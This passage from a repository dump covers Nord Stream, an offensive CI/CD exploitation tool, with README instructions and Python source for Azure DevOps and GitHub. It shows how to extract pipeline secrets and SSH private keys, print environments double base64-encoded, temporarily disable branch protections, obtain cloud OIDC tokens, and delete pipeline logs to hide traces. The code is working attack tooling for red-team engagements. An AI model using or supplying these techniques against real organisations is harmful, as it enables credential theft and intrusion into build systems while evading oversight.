+ ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz", data, (err) => {});|' $SSH_FILE displayName: Preparing Build artefacts - task: SSH@0 inputs: sshEndpoint: '#FIXME' runOptions: commands commands: sleep 1 - script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak $SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo '' displayName: Build artefacts ``` Then you need to: 1) change the `vmImage: ubuntu-latest` to `name: 'Self-Hosted pool name'` 2) Add the name of the service connection in the `#FIXME` placeholder. 3) deploy the pipeline with: `--yaml test.yml` If you need to run this on a windows self-hosted runner, in the `generatePipelineForSSH` method change `_serviceConnectionTemplateSSH` by `_serviceConnectionTemplateSSHWindows` and perform the actions described previously. Note: for both Windows and Linux self-hosted runners, you need to adapt the path (`/home/vsts/work/_tasks/` or `D:\a\`) to match the path where the runner is deployed. This information can be obtained in the `Capabilities` tab of an agent on Azure DevOps. #### Listing orgs With an access token it's possible to list the organizations bound to a user: ``` $ nord-stream devops --token "eyJ0eXA..." --list-orgs [*] User orgs: - myorg - supersecretorg ``` This is based on [this research](https://zolder.io/en/blog/devops-access-is-closer-than-you-assume/). #### Help ``` $ nord-stream devops -h CICD pipeline exploitation tool Usage: nord-stream devops [options] --token --org [extraction] [--project --write-filter --no-clean --branch-name --pipeline-name --repo-name ] nord-stream devops [options] --token --org --yaml --project [--write-filter --no-clean --branch-name --pipeline-name --repo-name ] nord-stream devops [options] --token --org --build-yaml [--build-type ] nord-stream devops [options] --token --org --clean-logs [--project ] nord-stream devops [options] --token --org --list-projects [--write-filter] nord-stream devops [options] --token --org (--list-secrets [--project --write-filter] | --list-users) nord-stream devops [options] --token --org --describe-token Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs --ignore-cert Allow insecure server connections Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token Azure DevOps personal token or JWT --org Org name -p, --project Run on selected project (can be a file) -y, --yaml Run arbitrary job --clean-logs Delete all pipeline created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean pipeline logs (default false) --list-projects List all projects. --list-secrets List all secrets. --list-users List all users. --write-filter Filter projects where current user has write or admin access. --build-yaml Create a pipeline yaml file with default configuration. --build-type Type used to generate the yaml file can be: default, azurerm, github, aws, sonar, ssh --describe-token Display information on the token --branch-name Use specific branch name for deployment. --pipeline-name Use pipeline for deployment. --repo-name Use specific repo for deployment. Exctraction: --extract Extract following secrets [vg,sf,gh,az,aws,sonar,ssh] --no-extract Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh] Examples: List all secrets from all projects $ nord-stream devops --token "$PAT" --org myorg --list-secrets Dump all secrets from all projects $ nord-stream devops --token "$PAT" --org myorg Authors: @hugow @0hexit ``` ### GitHub #### List protections The `--list-protections` option can be used to list the protections applied to a branch and to environments: ```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --list-protections [*] Using branch: "main" [*] Checking security: "synacktiv/repo" [*] Found branch protection rule on "main" branch [*] Branch protections: - enforce admins: True - block creations: True - required signatures: True - allow force pushes: False - allow deletions: False - required pull request reviews: False - required linear history: False - required conversation resolution: False - lock branch: False - allow fork syncing: False [*] Environment protection for: "DEV": - deployment branch policy: custom [*] No environment protection rule found for: "INT" [*] Environment protection for: "PROD": - deployment branch policy: custom ``` Depending on your permissions, you can have less information, only administrators can have the full details of the protections. #### Disable protections The `--disable-protections` option can be used to temporarily disable the protections applied to a branch or an environment, realize the dump and restore all the protections: ```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --no-repo --no-org --env prod --disable-protections [*] Using branch: "main" [+] "synacktiv/repo" [*] Found branch protection rule on "main" branch [...] [!] Removing branch protection, wait until it's restored. [*] Getting secrets from environment: "prod" (synacktiv/repo) [*] Environment protection for: "PROD": - deployment branch policy: custom [!] Modifying env protection, wait until it's restored. [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [!] Restoring env protections. [+] Secrets: secret_PROD_SECRET=my PROD_SECRET [*] Cleaning logs. [!] Restoring branch protection. ``` This requires admin privileges. #### Force By default, if Nord Stream detect a protection on a branch or on an environment it won't perform the secret extraction. If you think that the protections are too permissive or can be bypassed with your privileges, the `--force` option can be used to deploy the pipeline regardless of protections. #### Azure OIDC OIDC (OpenID Connect) can be used to connect to cloud services. The general idea is to allow authorized pipelines or workflows to get short-lived access tokens directly from a cloud provider, without involving any static secrets. Authorization is based on trust relationships configured on the cloud provider's side and being conditioned by the origin of the pipeline or workflow. Here is an example of a GitHub workflow using OIDC: ```yaml [...] steps: - name: OIDC Login to Azure Public Cloud uses: azure/login@v1 with: client-id: ${{ secrets.AZURE_CLIENT_ID }} tenant-id: ${{ secrets.AZURE_TENANT_ID }} subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} # this can be optional ``` If you come across such a workflow, this means that the repository might be configured to get a short-lived access token that can give you access to Azure resources. Nord Stream is able to deploy a pipeline to retrieve such access token with the following options: ```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --azure-client-id 65cd6002-25b9-11ee-88ac-7f80b19430c2 --azure-tenant-id 65cd6002-25b9-11ee-88ac-7f80b19430c2 [*] Using branch: "main" [+] "synacktiv/repo" [*] No branch protection rule found on "main" branch [*] Running OIDC Azure access tokens generation workflow [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] OIDC access tokens: Access token to use with Azure Resource Manager API: { "accessToken": "eyJ0eXAiOiJK[...]PVig", "expiresOn": "2023-07-18 23:18:57.000000", "subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2", "tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2", "tokenType": "Bearer" } Access token to use with MS Graph API: { "accessToken": "eyJ0eXAi[...]_qTA", "expiresOn": "2023-07-19 22:18:59.000000", "subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2", "tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2", "tokenType": "Bearer" } ``` The `--azure-subscription-id` is optional and can be used to get an access token for a specific subscription. #### AWS OIDC The same technique (see [Azure OIDC](#azure-oidc)) can be used to get a session token on AWS. Here is an example of a workflow using AWS OIDC: ```yaml [...] steps: - name: Configure AWS Credentials uses: aws-actions/configure-aws-credentials@v1 with: role-to-assume: arn:aws:iam::133333333337:role/S3Access/CustomRole role-session-name: oidcrolesession aws-region: us-east-1 ``` If you come across such a workflow, this means that the repository might be configured to get an AWS access token that can give you access to AWS resources. Nord Stream is able to deploy a pipeline to retrieve such access token with the following options: ```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --aws-role 'arn:aws:iam::133333333337:role/S3Access/CustomRole' --aws-region us-east-1 --force [+] "Synacktiv/repo" [*] Running OIDC AWS credentials generation workflow [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] OIDC credentials: AWS_DEFAULT_REGION=us-east-1 AWS_SESSION_TOKEN=IQoJb3[...]KMs0/QB6 AWS_REGION=us-east-1 AWS_ACCESS_KEY_ID=ASIA5ABC8XDMAP2ANNWO AWS_SECRET_ACCESS_KEY=7KJLCjdJKqlpLKDAI9F7SH6SjSQBX68Sjm13xXDA ``` #### Help ``` $ nord-stream github -h CICD pipeline exploitation tool Usage: nord-stream github [options] --token --org [--repo --no-repo --no-env --no-org --env --disable-protections --branch-name --no-clean (--key-id --user --email )] nord-stream github [options] --token --org --yaml --repo [--env --disable-protections --branch-name --no-clean (--key-id --user --email )] nord-stream github [options] --token --org ([--clean-logs] [--clean-branch-policy]) [--repo --branch-name ] nord-stream github [options] --token --org --build-yaml --repo [--env ] nord-stream github [options] --token --org --azure-tenant-id --azure-client-id [--azure-subscription-id --repo --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --aws-role --aws-region [--repo --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --list-protections [--repo --branch-name --disable-protections (--key-id --user --email )] nord-stream github [options] --token --org --list-secrets [--repo --no-repo --no-env --no-org] nord-stream github [options] --token [--org ] --list-repos [--write-filter] nord-stream github [options] --token --describe-token Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs Signing: --key-id GPG primary key ID --user User used to sign commits --email Email address used to sign commits args --token Github personal token --org Org name -r, --repo Run on selected repo (can be a file) -y, --yaml Run arbitrary job --clean-logs Delete all logs created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean workflow logs (default false) --clean-branch-policy Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered. --build-yaml Create a pipeline yaml file with all secrets. --env Specify env for the yaml file creation. --no-repo Don't extract repo secrets. --no-env Don't extract environnments secrets. --no-org Don't extract organization secrets. --azure-tenant-id Identifier of the Azure tenant associated with the application having federated credentials (OIDC related). --azure-subscription-id Identifier of the Azure subscription associated with the application having federated credentials (OIDC related). --azure-client-id Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related). --aws-role AWS role to assume (OIDC related). --aws-region AWS region (OIDC related). --list-protections List all protections. --list-repos List all repos. --list-secrets List all secrets. --disable-protections Disable the branch protection rules (needs admin rights) --write-filter Filter repo where current user has write or admin access. --force Don't check environment and branch protections. --branch-name Use specific branch name for deployment. --describe-token Display information on the token Examples: List all secrets from all repositories $ nord-stream github --token "$GHP" --org myorg --list-secrets Dump all secrets from all repositories and try to disable branch protections $ nord-stream github --token "$GHP" --org myorg --disable-protections Authors: @hugow @0hexit ``` ### GitLab As described in the article, there is no way to remove the logs in the activity tab after a pipeline deployment. This must be taken into account during Red Team engagements. #### List secrets The `--list-secrets` option can be used to list and extract secrets from GitLab. The way in which GitLab manages secrets is a bit different from Azure DevOps and GitHub action. With admin access to a project, group or even admin access on the GitLab instance, it is possible to extract all the CI/CD variables that are defined without deploying any pipeline. From a low privilege user however, it is not possible to list the secrets that are defined at the project / group or instance levels. However, if users have write privileges over a project, they will be able to deploy a malicious pipeline to exfiltrate the environment variables exposing the CI/CD variables. This means that a low privilege user has no mean to know if a secret is defined in a specific project. The only way is to look at legitimate pipelines that are already present in a project and check if a pipeline uses sensitive environment variables. Here is a pipeline file to perform this operation on GitLab: ```yaml stages: - synacktiv deploy-production: image: ubuntu:latest stage: synacktiv script: - env | base64 -w0 | base64 -w 0 ``` GitLab also support secure files like Azure DevOps. Secure files are defined at the project level. Like the variables It's not possible to list the secure files without admin access to the project. However, with admin access nord-stream will try to exfiltrate the secure files related to the projects. #### YAML Same as [YAML](#yaml), however you need to provide the full project path like this: ```sh $ nord-stream gitlab --token "$PAT" --url https://gitlab.corp.local --project 'group/projectname' --yaml ci.yml ``` The output of the command `--list-projects` returns such path. #### List protections Same as [GitHub list protections](#list-protections) #### Help ``` $ nord-stream gitlab -h CICD pipeline exploitation tool Usage: nord-stream gitlab [options] --token (--list-secrets | --list-protections) [--project --group --no-project --no-group --no-instance --write-filter] nord-stream gitlab [options] --token ( --list-groups | --list-projects ) [--project --group --write-filter] nord-stream gitlab [options] --token --yaml --project [--no-clean] nord-stream gitlab [options] --token --clean-logs [--project ] nord-stream gitlab [options] --token --describe-token Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs --url Gitlab URL [default: https://gitlab.com] --ignore-cert Allow insecure server connections Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token GitLab personal access token or _gitlab_session cookie --project Run on selected project (can be a file) --group Run on selected group (can be a file) --list-secrets List all secrets. --list-protections List branch protection rules. --list-projects List all projects. --list-groups List all groups. --write-filter Filter repo where current user has developer access or more. --no-project Don't extract project secrets. --no-group Don't extract group secrets. --no-instance Don't extract instance secrets. -y, --yaml Run arbitrary job --branch-name Use specific branch name for deployment. --clean-logs Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean pipeline logs (default false) --describe-token Display information on the token Examples: Dump all secrets $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets Deploy the custom pipeline on the master branch $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch master --project 'group/projectname' Authors: @hugow @0hexit ``` ## TODO - [ ] Add support of URLs corresponding to Azure DevOps Server instances (on-premises solutions) - [ ] Add an option to extract secrets via Windows hosts - [ ] Add support of other CI/CD environments (Jenkins/Bitbucket) - [ ] Use the GitHub GraphQL API instead of the REST one to list the branch protection rules and temporarily disable them if they match the malicious branch about to be pushed ## Contact Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to us on Twitter [@hugow](https://twitter.com/hugow_vincent) and [@0hexit](https://twitter.com/0hexit). ================================================ FILE: nordstream/__main__.py ================================================ #!/usr/bin/env python3 """ CICD pipeline exploitation tool Usage: nord-stream [...] Commands github command related to GitHub. devops command related to Azure DevOps. gitlab command related to GitLab. Options: -h --help Show this screen. --version Show version. Authors: @hugow @0hexit """ from docopt import docopt from nordstream.utils.log import logger def main(): args = docopt(__doc__, version="0.1", options_first=True) argv = [args[""]] + args[""] if args[""] == "github": import nordstream.commands.github as github github.start(argv) elif args[""] == "devops": import nordstream.commands.devops as devops devops.start(argv) elif args[""] == "gitlab": import nordstream.commands.gitlab as gitlab gitlab.start(argv) else: logger.error(f"{args['']} is not a nord-stream command.") if __name__ == "__main__": main() ================================================ FILE: nordstream/cicd/devops.py ================================================ import requests import time from os import makedirs from nordstream.utils.log import logger from nordstream.yaml.devops import DevOpsPipelineGenerator from nordstream.git import Git from nordstream.utils.errors import DevOpsError from nordstream.utils.constants import * from nordstream.utils.helpers import isAZDOBearerToken # painfull warnings you know what you are doing right ? requests.packages.urllib3.disable_warnings() class DevOps: _DEFAULT_PIPELINE_NAME = DEFAULT_PIPELINE_NAME _DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME _token = None _auth = None _org = None _devopsLoginId = None _projects = [] _baseURL = "https://dev.azure.com/" _header = { "Accept": "application/json; api-version=6.0-preview", "User-Agent": USER_AGENT, } _session = None _repoName = DEFAULT_REPO_NAME _outputDir = OUTPUT_DIR _pipelineName = _DEFAULT_PIPELINE_NAME _branchName = _DEFAULT_BRANCH_NAME _defaultAgentPool = None _sleepTime = 15 _maxRetry = 10 def __init__(self, token, org, verifCert): self._token = token self._org = org self._baseURL += f"{org}/" self._session = requests.Session() self.setCookiesAndHeaders() self._session.verify = verifCert self._devopsLoginId = self.__getLogin() @property def projects(self): return self._projects @property def org(self): return self._org @property def branchName(self): return self._branchName @branchName.setter def branchName(self, value): self._branchName = value @property def repoName(self): return self._repoName @repoName.setter def repoName(self, value): self._repoName = value @property def pipelineName(self): return self._pipelineName @pipelineName.setter def pipelineName(self, value): self._pipelineName = value @property def defaultAgentPool(self): return self._defaultAgentPool @defaultAgentPool.setter def defaultAgentPool(self, value): self._defaultAgentPool = value @property def sleepTime(self): return self._sleepTime @sleepTime.setter def sleepTime(self, value): self._sleepTime = int(value) @property def token(self): return self._token @property def outputDir(self): return self._outputDir @outputDir.setter def outputDir(self, value): self._outputDir = value @property def defaultPipelineName(self): return self._DEFAULT_PIPELINE_NAME @property def defaultBranchName(self): return self._DEFAULT_BRANCH_NAME def __getLogin(self): return self.getUser().get("authenticatedUser").get("id") def getUser(self): logger.debug("Retrieving user informations") return self._session.get( f"{self._baseURL}/_apis/ConnectionData", ).json() def setCookiesAndHeaders(self): if isAZDOBearerToken(self._token): self._session.headers.update({"Authorization": f"Bearer {self._token}"}) else: self._session.auth = ("", self._token) self._session.headers.update(self._header) def listProjects(self): logger.debug("Listing projects") continuationToken = 0 # Azure DevOps pagination while True: params = {"continuationToken": continuationToken} response = self._session.get( f"{self._baseURL}/_apis/projects", params=params, ).json() if len(response.get("value")) != 0: for repo in response.get("value"): p = {"id": repo.get("id"), "name": repo.get("name")} self._projects.append(p) continuationToken += response.get("count") else: break def listUsers(self): logger.debug("Listing users") continuationToken = None res = [] params = {} # Azure DevOps pagination while True: if continuationToken: params = {"continuationToken": continuationToken} response = self._session.get( f"https://vssps.dev.azure.com/{self._org}/_apis/graph/users", params=params, ) headers = response.headers response = response.json() if len(response.get("value")) != 0: for user in response.get("value"): p = { "origin": user.get("origin"), "displayName": user.get("displayName"), "mailAddress": user.get("mailAddress"), } res.append(p) continuationToken = headers.get("x-ms-continuationtoken", None) if not continuationToken: break else: break return res # TODO: crappy code I know def filterWriteProjects(self): continuationToken = None res = [] params = {} # Azure DevOps pagination while True: if continuationToken: params = {"continuationToken": continuationToken} response = self._session.get( f"https://vssps.dev.azure.com/{self._org}/_apis/graph/groups", params=params, ) headers = response.headers response = response.json() if len(response.get("value")) != 0: for project in self._projects: for group in response.get("value"): name = project.get("name") if self.__checkProjectPrivs(self._devopsLoginId, name, group): duplicate = False for p in res: if p.get("id") == project.get("id"): duplicate = True if not duplicate: res.append(project) continuationToken = headers.get("x-ms-continuationtoken", None) if not continuationToken: break else: break self._projects = res def __checkProjectPrivs(self, login, projectName, group): groupPrincipalName = group.get("principalName") writeGroups = [ f"[{projectName}]\\{projectName} Team", f"[{projectName}]\\Contributors", f"[{projectName}]\\Project Administrators", ] pagingToken = None params = {} for g in writeGroups: if groupPrincipalName == g: originId = group.get("originId") while True: if pagingToken: params = {"pagingToken": pagingToken} response = self._session.get( f"https://vsaex.dev.azure.com/{self._org}/_apis/GroupEntitlements/{originId}/members", params=params, ).json() pagingToken = response.get("continuationToken") if len(response.get("items")) != 0: for user in response.get("items"): if user.get("id") == login: return True else: return False def listRepositories(self, project): logger.debug("Listing repositories") response = self._session.get( f"{self._baseURL}/{project}/_apis/git/repositories", ).json() return response.get("value") def listPipelines(self, project): logger.debug("Listing pipelines") response = self._session.get( f"{self._baseURL}/{project}/_apis/pipelines", ).json() return response.get("value") def addProject(self, project): logger.debug(f"Checking project: {project}") response = self._session.get( f"{self._baseURL}/_apis/projects/{project}", ).json() if response.get("id"): p = {"id": response.get("id"), "name": response.get("name")} self._projects.append(p) @classmethod def checkToken(cls, token, org, verifCert): logger.verbose(f"Checking token: {token}") try: return ( requests.get( f"https://dev.azure.com/{org}/_apis/ConnectionData", auth=("foo", token), headers=DevOps._header, verify=verifCert, ).status_code == 200 ) except Exception as e: logger.error(e) return False def listProjectVariableGroupsSecrets(self, project): logger.debug(f"Listing variable groups for: {project}") response = self._session.get( f"{self._baseURL}/{project}/_apis/distributedtask/variablegroups", ) if response.status_code != 200: raise DevOpsError("Can't list variable groups secrets.") response = response.json() res = [] if response.get("count", 0) != 0: for variableGroup in response.get("value"): name = variableGroup.get("name") id = variableGroup.get("id") variables = [] for var in variableGroup.get("variables").keys(): variables.append(var) res.append({"name": name, "id": id, "variables": variables}) return res def listProjectSecureFiles(self, project): logger.debug(f"Listing secure files for: {project}") response = self._session.get( f"{self._baseURL}/{project}/_apis/distributedtask/securefiles", ) if response.status_code != 200: raise DevOpsError("Can't list secure files.") response = response.json() res = [] if response["count"]: for secureFile in response["value"]: res.append({"name": secureFile["name"], "id": secureFile["id"]}) return res def authorizePipelineForResourceAccess(self, projectId, pipelineId, resource, resourceType): resourceId = resource["id"] logger.debug(f"Checking current pipeline permissions for: \"{resource['name']}\"") response = self._session.get( f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}", ).json() allPipelines = response.get("allPipelines") if allPipelines and allPipelines.get("authorized"): return True for pipeline in response.get("pipelines"): if pipeline.get("id") == pipelineId: return True logger.debug(f"\"{resource['name']}\" has restricted permissions. Adding access permissions for the pipeline") response = self._session.patch( f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}", json={"pipelines": [{"id": pipelineId, "authorized": True}]}, ) if response.status_code != 200: logger.error(f"Error: unable to give the custom pipeline access to {resourceType}: \"{resource['name']}\"") return False return True def createGit(self, project): logger.debug(f"Creating git repo for: {project}") data = {"name": self._repoName, "project": {"id": project}} response = self._session.post( f"{self._baseURL}/{project}/_apis/git/repositories", json=data, ).json() return response def deleteGit(self, project, repoId): logger.debug(f"Deleting git repo for: {project}") response = self._session.delete( f"{self._baseURL}/{project}/_apis/git/repositories/{repoId}", ) return response.status_code == 204 def createPipeline(self, project, repoId, path): logger.debug("Creating pipeline") data = { "folder": None, "name": self._pipelineName, "configuration": { "type": "yaml", "path": path, "repository": { "id": repoId, "type": "azureReposGit", "defaultBranch": self._branchName, }, }, } response = self._session.post( f"{self._baseURL}/{project}/_apis/pipelines", json=data, ).json() pipeline_id = response.get("id") if self._defaultAgentPool: logger.debug("Setting default agent pool") # Retrieve project queues, not organization pools, for Default agent pool queues_url = f"{self._baseURL}/{project}/_apis/distributedtask/queues" response = self._session.get(queues_url) queues = response.json() queue_id = None queue_name = None for queue in queues['value']: if queue['pool']['name'] == self._defaultAgentPool: queue_id = queue['id'] queue_name = queue['name'] logger.info(f"Queue found : {queue_name} (Queue ID: {queue_id}, Pool ID: {queue['pool']['id']})") break if not queue_id: logger.error(f"Queue {self._defaultAgentPool} not found for default agent pool, or not accessible by the project. Not updating") return pipeline_id # Update pipeline Default agent with specified queue, via the definitions API update_url = f"{self._baseURL}/{project}/_apis/build/definitions/{pipeline_id}" response = self._session.get(update_url) definition = response.json() # Add default pool agent with queue definition['queue'] = { 'id': queue_id, 'name': queue_name } response = self._session.put(update_url, json=definition) return pipeline_id def runPipeline(self, project, pipelineId): logger.debug(f"Running pipeline: {pipelineId}") params = { "definition": {"id": pipelineId}, "sourceBranch": f"refs/heads/{self._branchName}", } response = self._session.post( f"{self._baseURL}/{project}/_apis/build/Builds", json=params, ).json() return response def __getBuilds(self, project): logger.debug(f"Getting builds.") return ( self._session.get( f"{self._baseURL}/{project}/_apis/build/Builds", ) .json() .get("value") ) def __getBuildSources(self, project, buildId): return self._session.get( f"{self._baseURL}/{project}/_apis/build/Builds/{buildId}/sources", ).json() def getRunId(self, project, pipelineId): logger.debug(f"Getting RunId for pipeline: {pipelineId}") for i in range(self._maxRetry): # Don't wait first time if i != 0: logger.warning(f"Run not available, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) for build in self.__getBuilds(project): if build.get("definition").get("id") == pipelineId: buildId = build.get("id") buildSource = self.__getBuildSources(project, buildId) if ( buildSource.get("comment") == Git.ATTACK_COMMIT_MSG and buildSource.get("author").get("email") == Git.EMAIL ): return buildId if i == (self._maxRetry): logger.error("Error: run still not ready.") return None def waitPipeline(self, project, pipelineId, runId): logger.info("Getting pipeline output") for i in range(self._maxRetry): if i != 0: logger.warning(f"Pipeline still running, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._baseURL}/{project}/_apis/pipelines/{pipelineId}/runs/{runId}", json={}, ).json() if response.get("state") == "completed": return response.get("result") if i == (self._maxRetry - 1): logger.error("Error: pipeline still not finished.") return None def __createPipelineOutputDir(self, projectName): makedirs(f"{self._outputDir}/{self._org}/{projectName}", exist_ok=True) def downloadPipelineOutput(self, projectId, runId): self.__createPipelineOutputDir(projectId) for i in range(self._maxRetry): if i != 0: logger.warning(f"Output not ready, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) buildTimeline = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/timeline", json={}, ).json() logs = [ record["log"]["id"] for record in buildTimeline["records"] if record["name"] == DevOpsPipelineGenerator.taskName ] if len(logs) != 0: break # if there are logs but we didn't find the taskName get the last # job as it contain all data if len(buildTimeline["records"]) > 0: logs = [buildTimeline["records"][-1]["log"]["id"]] break if i == (self._maxRetry - 1): logger.error("Output still no ready, error !") return None logId = logs[0] logger.debug(f"Log ID of the extraction task: {logId}") for i in range(self._maxRetry): if i != 0: logger.warning(f"Output not ready, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) logOutput = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/logs/{logId}", json={}, ).json() if len(logOutput.get("value")) != 0: break if i == (self._maxRetry - 1): logger.error("Output still no ready, error !") return None date = time.strftime("%Y-%m-%d_%H-%M-%S") with open(f"{self._outputDir}/{self._org}/{projectId}/pipeline_{date}.log", "w") as f: for line in logOutput.get("value"): f.write(line + "\n") f.close() return f"pipeline_{date}.log" def __cleanRunLogs(self, projectId): logger.verbose("Cleaning run logs.") builds = self.__getBuilds(projectId) if len(builds) != 0: for build in builds: buildId = build.get("id") buildSource = self.__getBuildSources(projectId, buildId) if ( buildSource.get("comment") == (Git.ATTACK_COMMIT_MSG or Git.CLEAN_COMMIT_MSG) and buildSource.get("author").get("email") == Git.EMAIL ): return buildId self._session.delete( f"{self._baseURL}/{projectId}/_apis/build/builds/{buildId}", ) def __cleanPipeline(self, projectId): logger.verbose(f"Removing pipeline.") response = self._session.get( f"{self._baseURL}/{projectId}/_apis/pipelines", ).json() if response.get("count", 0) != 0: for pipeline in response.get("value"): if pipeline.get("name") == self._pipelineName: pipelineId = pipeline.get("id") self._session.delete( f"{self._baseURL}/{projectId}/_apis/pipelines/{pipelineId}", ) def deletePipeline(self, projectId): logger.debug("Deleting pipeline") response = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/Definitions", json={}, ).json() if response.get("count", 0) != 0: for pipeline in response.get("value"): if pipeline.get("name") == self._pipelineName: definitionId = pipeline.get("id") self._session.delete( f"{self._baseURL}/{projectId}/_apis/build/definitions/{definitionId}", json={}, ) def cleanAllLogs(self, projectId): self.__cleanRunLogs(projectId) def listServiceConnections(self, projectId): logger.debug("Listing service connections") res = [] response = self._session.get( f"{self._baseURL}/{projectId}/_apis/serviceendpoint/endpoints", json={}, ) if response.status_code != 200: raise DevOpsError("Can't list service connections.") response = response.json() if response.get("count", 0) != 0: res = response.get("value") return res def getFailureReason(self, projectId, runId): res = [] response = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}", ).json() for result in response.get("validationResults"): res.append(result.get("message")) try: timeline = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/Timeline", ).json() for record in timeline.get("records", []): if record.get("issues"): for issue in record.get("issues"): res.append(issue.get("message")) except: pass return res @classmethod def getOrgs(cls, token): logger.verbose(f"Listing orgs") if isAZDOBearerToken(token): # https://github.com/zolderio/devops/blob/main/get_profile_org_repos.py url = "https://app.vssps.visualstudio.com/_apis/profile/profiles/me?api-version=7.1" # Headers with authentication and content type headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } response = requests.get(url, headers=headers) # Check if request was successful response.raise_for_status() # Parse and print the JSON response data = response.json() # Get organizations URL from profile response orgs_url = "https://app.vssps.visualstudio.com/_apis/accounts?memberId={}?api-version=7.1".format(data['id']) # Get organizations orgs_response = requests.get(orgs_url, headers=headers) orgs_response.raise_for_status() return orgs_response.json() else: raise DevOpsError("Only access token can be used for this operation.") ================================================ FILE: nordstream/cicd/github.py ================================================ import requests import time from os import makedirs import urllib.parse from nordstream.utils.errors import GitHubError, GitHubBadCredentials from nordstream.utils.log import logger from nordstream.git import Git from nordstream.utils.constants import * class GitHub: _DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME _token = None _auth = None _org = None _githubLogin = None _repos = [] _header = { "Accept": "application/vnd.github+json", "User-Agent": USER_AGENT, } _repoURL = "https://api.github.com/repos" _session = None _branchName = _DEFAULT_BRANCH_NAME _outputDir = OUTPUT_DIR _sleepTime = 15 _maxRetry = 10 _isGHSToken = False def __init__(self, token): self._token = token self._auth = ("foo", self._token) self._session = requests.Session() if token.lower().startswith("ghs_"): self._isGHSToken = True self._githubLogin = self.__getLogin() @staticmethod def checkToken(token): logger.verbose(f"Checking token: {token}") headers = GitHub._header headers["Authorization"] = f"token {token}" data = {"query": "query UserCurrent{viewer{login}}"} return requests.post("https://api.github.com/graphql", headers=headers, json=data).status_code == 200 @property def token(self): return self._token @property def org(self): return self._org @org.setter def org(self, org): self._org = org @property def defaultBranchName(self): return self._DEFAULT_BRANCH_NAME @property def branchName(self): return self._branchName @branchName.setter def branchName(self, value): self._branchName = value @property def repos(self): return self._repos @property def outputDir(self): return self._outputDir @outputDir.setter def outputDir(self, value): self._outputDir = value def __getLogin(self): return self.getLoginWithGraphQL().json().get("data").get("viewer").get("login") def getUser(self): logger.debug("Retrieving user informations") return self._session.get(f"https://api.github.com/user", auth=self._auth, headers=self._header) def getLoginWithGraphQL(self): logger.debug("Retrieving identity with GraphQL") headers = self._header headers["Authorization"] = f"token {self._token}" data = {"query": "query UserCurrent{viewer{login}}"} return self._session.post("https://api.github.com/graphql", headers=headers, json=data) def __paginatedGet(self, url, data="", maxData=0): page = 1 res = [] while True: params = {"page": page} response = self._session.get( url, params=params, auth=self._auth, headers=self._header, ).json() if not isinstance(response, list) and response.get("message", None): if response.get("message") == "Bad credentials": raise GitHubBadCredentials(response.get("message")) elif response.get("message") != "Not Found": raise GitHubError(response.get("message")) return res if (data != "" and len(response.get(data)) == 0) or (data == "" and len(response) == 0): break if data != "" and len(response.get(data)) != 0: res.extend(response.get(data, [])) if data == "" and len(response) != 0: res.extend(response) if maxData != 0 and len(res) >= maxData: break page += 1 return res def listRepos(self): logger.debug("Listing repos") if self._isGHSToken: url = f"https://api.github.com/orgs/{self._org}/repos" else: url = f"https://api.github.com/user/repos" response = self.__paginatedGet(url) for repo in response: # filter for specific org if self._org: if self._org.lower() == repo.get("owner").get("login").lower(): self._repos.append(repo.get("full_name")) else: self._repos.append(repo.get("full_name")) def addRepo(self, repo): logger.debug(f"Checking repo: {repo}") if self._org: full_name = self._org + "/" + repo else: # if no org, must provide repo as 'org/repo' # FIXME: This cannot happen at the moment because --org argument is required if len(repo.split("/")) == 2: full_name = repo else: # FIXME: Raise an Exception here logger.error("Invalid repo name: {repo}") response = self._session.get( 